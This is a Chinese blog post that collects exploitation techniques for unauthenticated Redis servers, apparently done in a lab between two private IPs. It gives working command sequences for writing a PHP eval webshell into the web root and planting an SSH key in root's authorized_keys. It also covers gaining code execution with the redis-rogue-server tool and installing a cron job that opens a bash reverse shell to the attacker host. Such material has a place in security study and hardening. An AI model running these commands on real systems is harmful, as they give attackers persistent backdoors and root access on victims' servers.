Redis未授权访问漏洞利用合集

Aaron_Jㅤ2024-08-18 9:58

一、基本信息

靶机:IP:192.168.100.40

攻击机:IP:192.168.100.60

二、漏洞 & 过程

Redis 未授权访问漏洞利用无口令远程登录靶机

靶机

复制代码

|---|--------------------------------|
| | cd redis-4.0.8/src |
| | ./redis-server ../redis.conf |

攻击机

复制代码

|---|---------------------------------|
| | ./redis-cli -h 192.168.100.40 |

Redis 未授权访问漏洞利用持久化写入一句话木马

攻击机写下如下 redis 命令
复制代码

|---|--------------------------------------------------------------------|
| | config set dir /var/www/html |
| | config set dbfilename test.php |
| | set webshell "\r\n\r\n<?php @eval($_POST['passwd']); ?>\r\n\r\n" |
| | save |

蚁剑连接

Redis 未授权访问漏洞利用公私钥认证获取 root 权限

攻击机 & 靶机

复制代码

|---|---------------------|
| | ssh-keygen -t rsa |

攻击机

复制代码

|---|------------------------------------------------------------------------------|
| | (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > 1.txt |
| | cat 1.txt | /root/redis-4.0.8/src/redis-cli -h 192.168.100.40 -x set crack |

复制代码

|---|-----------------------------------------|
| | config set dir /root/.ssh |
| | config set dbfilename authorized_keys |
| | save |

远程连接
复制代码

|---|-------------------------------------|
| | ssh -i id_rsa [email protected] |

Redis 未授权访问漏洞利用攻击软件获得 shell

攻击机

复制代码

|---|---------------------------------|
| | cd /root/redis-4.0.8/src |
| | ./redis-cli -h 192.168.100.40 |
| | slaveof 192.168.100.60 6379 |
| | info replication |

复制代码

|---|-----------------------------------------------------|
| | unzip redis-rogue-server-master.zip |
| | cd redis-rogue-server-master/RedisModulesSDK/exp |
| | make |

复制代码

|---|----------------------------------------------------------------------------------------------------------------------------|
| | python3 /root/redis-rogue-server-master/redis-rogue-server.py --rhost 192.168.100.40 --lhost 192.168.100.60 --exp exp.so |

未授权访问漏洞利用持久化写计划任务来反弹一个 shell 权限

攻击机监听端口

复制代码

|---|-----------------|
| | nc -lvvp 8888 |

设置 shell 反弹

复制代码

|---|---------------------------------------------------------------------------------|
| | cd /root/redis-4.0.8/src |
| | ./redis-cli -h 192.168.100.40 |
| | set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/192.168.100.60/8888 0>&1\n\n" |
| | config set dir /var/spool/cron/ |
| | config set dbfilename root |
| | save |

反弹成功

作 者:PeiyuJue

链 接: Redis未授权访问漏洞利用合集 -- Candid Chronicles

来 源:Aaron的博客

版 权 声 明:本博客所有文章除特别声明外,均采用CC BY-NC-SA 4.0许可协议。文章版权归作者所有,未经允许请勿转载!

相关推荐
KALC17 分钟前
告别“知识孤岛”:RAG赋能网络安全运营
人工智能·网络安全
网硕互联的小客服33 分钟前
Linux服务器安全如何加固?禁用不必要的服务与端口如何操作?
安全
LDM>W<35 分钟前
黑马点评-用户登录
java·redis
落寞的魚丶1 小时前
2025 年九江市第二十三届中职学校技能大赛 (网络安全)赛项竞赛样题
网络安全·服务器配置·2025九江职业技能大赛·九江第23届技能大赛·中职网络安全
神经毒素1 小时前
WEB安全--Java安全--shiro550反序列化漏洞
java·安全·web安全·shiro
2501_915909062 小时前
开发日常中的抓包工具经验谈:Charles 抓包工具与其它选项对比
websocket·网络协议·tcp/ip·http·网络安全·https·udp
mooyuan天天2 小时前
SQL注入报错“Illegal mix of collations for operation ‘UNION‘”解决办法
数据库·web安全·sql注入·dvwa靶场·sql报错
一口一个橘子2 小时前
[ctfshow web入门] web77
前端·web安全·网络安全
Johny_Zhao2 小时前
Vmware workstation安装部署微软SCCM服务系统
网络·人工智能·python·sql·网络安全·信息安全·微软·云计算·shell·系统运维·sccm
阿斯顿法国红酒快3 小时前
Windows系统安全加固
网络·windows·安全·网络安全·系统安全·ddos
热门推荐
01KGG转MP3工具|非KGM文件|解密音频02YOLOv8入门 | 重要性能衡量指标、训练结果评价及分析及影响mAP的因素【发论文关注的指标】03从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑04【SpeedAI科研小助手】2分钟极速解决知网维普重复率、AIGC率过高,一键全文降!文件格式不变,公式都保留的!05DeepSeek各版本说明与优缺点分析06Coze扣子平台完整体验和实践(附国内和国际版对比)07Ubuntu24.04安装中文输入法08YOLOv5改进 | 添加CA注意力机制 + 增加预测层 + 更换损失函数之GIoU09苍穹外卖面试总结10组基轨迹建模 GBTM的介绍与实现(Stata 或 R)